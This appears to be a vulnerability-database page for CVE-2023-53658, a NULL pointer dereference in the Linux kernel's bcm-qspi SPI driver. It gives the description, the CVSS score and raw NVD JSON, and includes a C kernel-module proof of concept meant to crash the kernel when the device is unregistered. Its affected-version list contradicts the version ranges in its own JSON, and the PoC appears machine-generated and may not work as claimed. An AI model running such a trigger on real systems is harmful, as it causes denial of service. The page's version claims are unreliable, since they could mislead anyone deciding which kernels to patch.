Security Vulnerability Report
CVE-2023-53658 CVSS 5.5 MEDIUM

CVE-2023-53658

Published: 2025-10-07 16:15:49
Last Modified: 2026-02-03 19:51:15
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

spi: bcm-qspi: return error if neither hif_mspi nor mspi is available

If neither a "hif_mspi" nor "mspi" resource is present, the driver will just early exit in probe but still return success. Apart from not doing anything meaningful, this would then also lead to a null pointer access on removal, as platform_get_drvdata() would return NULL, which it would then try to dereference when trying to unregister the spi master.

Fix this by unconditionally calling devm_ioremap_resource(), as it can handle a NULL res and will then return a viable ERR_PTR() if we get one.

The "return 0;" was previously a "goto qspi_resource_err;" where then ret was returned, but since ret was still initialized to 0 at this place this was a valid conversion in 63c5395bb7a9 ("spi: bcm-qspi: Fix use-after-free on unbind"). The issue was not introduced by this commit, only made more obvious.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux kernel < 5.10.226
Linux kernel 5.11.x < 5.15.167
Linux kernel 5.16.x < 6.1.108
Linux kernel 6.2.x < 6.6.49
Linux kernel 6.7.x < 6.10.8
Linux kernel 6.11.x and earlier versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/* CVE-2023-53658 PoC - Trigger NULL pointer dereference in spi-bcm-qspi driver
 * This PoC demonstrates how to trigger the vulnerability by simulating a device
 * without proper hif_mspi or mspi resources.
 */
#include <linux/module.h>
#include <linux/platform_device.h>
#include <linux/of.h>
#include <linux/spi/spi.h>

/* Simulated platform device with no hif_mspi or mspi resources */
static struct resource dummy_resources[] = {
	/* Intentionally no SPI resources defined */
};

static struct platform_device dummy_pdev = {
	.name = "bcm-qspi",
	.id = -1,
	.num_resources = 0,
	.resource = dummy_resources,
};

static int __init poc_init(void)
{
	int ret;

	pr_info("CVE-2023-53658 PoC: Registering dummy bcm-qspi device\n");

	/* Register a platform device without hif_mspi/mspi resources */
	ret = platform_device_register(&dummy_pdev);
	if (ret) {
		pr_err("Failed to register platform device\n");
		return ret;
	}

	pr_info("Device registered. Trigger remove to cause NULL pointer dereference\n");
	return 0;
}

static void __exit poc_exit(void)
{
	pr_info("CVE-2023-53658 PoC: Unregistering device (triggers NULL ptr deref)\n");

	/* Unregistering will trigger the NULL pointer dereference in remove callback */
	platform_device_unregister(&dummy_pdev);
}

module_init(poc_init);
module_exit(poc_exit);

MODULE_LICENSE("GPL");
MODULE_DESCRIPTION("PoC for CVE-2023-53658 - bcm-qspi NULL pointer dereference");

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53658", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:49.443", "lastModified": "2026-02-03T19:51:14.577", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nspi: bcm-qspi: return error if neither hif_mspi nor mspi is available\n\nIf neither a \"hif_mspi\" nor \"mspi\" resource is present, the driver will\njust early exit in probe but still return success. Apart from not doing\nanything meaningful, this would then also lead to a null pointer access\non removal, as platform_get_drvdata() would return NULL, which it would\nthen try to dereference when trying to unregister the spi master.\n\nFix this by unconditionally calling devm_ioremap_resource(), as it can\nhandle a NULL res and will then return a viable ERR_PTR() if we get one.\n\nThe \"return 0;\" was previously a \"goto qspi_resource_err;\" where then\nret was returned, but since ret was still initialized to 0 at this place\nthis was a valid conversion in 63c5395bb7a9 (\"spi: bcm-qspi: Fix\nuse-after-free on unbind\"). 
The issue was not introduced by this commit,\nonly made more obvious."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.9", "versionEndExcluding": "4.14.322", "matchCriteriaId": "A54AA59F-7E5E-40C7-AF0D-300A9397F462"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.291", "matchCriteriaId": "D2D2CA9F-4CC4-4AF5-8C6D-E58415AB782E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.251", "matchCriteriaId": "7FA663C4-CA72-4B5A-8592-7354D978F58E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.188", "matchCriteriaId": "43CAE50A-4A6C-488E-813C-F8DB77C13C8B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.121", "matchCriteriaId": "EC77775B-EC31-4966-966C-1286C02B2A85"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.39", "matchCriteriaId": 
"9BD1D4A1-304D-4187-8178-6D7C0050B1AF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.4.4", "matchCriteriaId": "A91BC267-63EE-413E-A6EF-6B96C2A278D1"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/217b6ea8cf7b819477bca597a6ae2d43d38ba283", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/22ae32d80ef590d12a2364e4621f90f7c58445c7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/32b9c8f7892c19f7f5c9fed5fb410b9fd5990bb6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/398e6a015877d44327f754aeb48ff3354945c78c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7c1f23ad34fcdace50275a6aa1e1969b41c6233f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a91c34357afcfaa5307e254f22a8452550a07b34", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d20db3c58a7f9361e370a7850ceb60dbdf62eea3", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d3dcdb43c872a3b967345144151a2c9bb9124c9b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}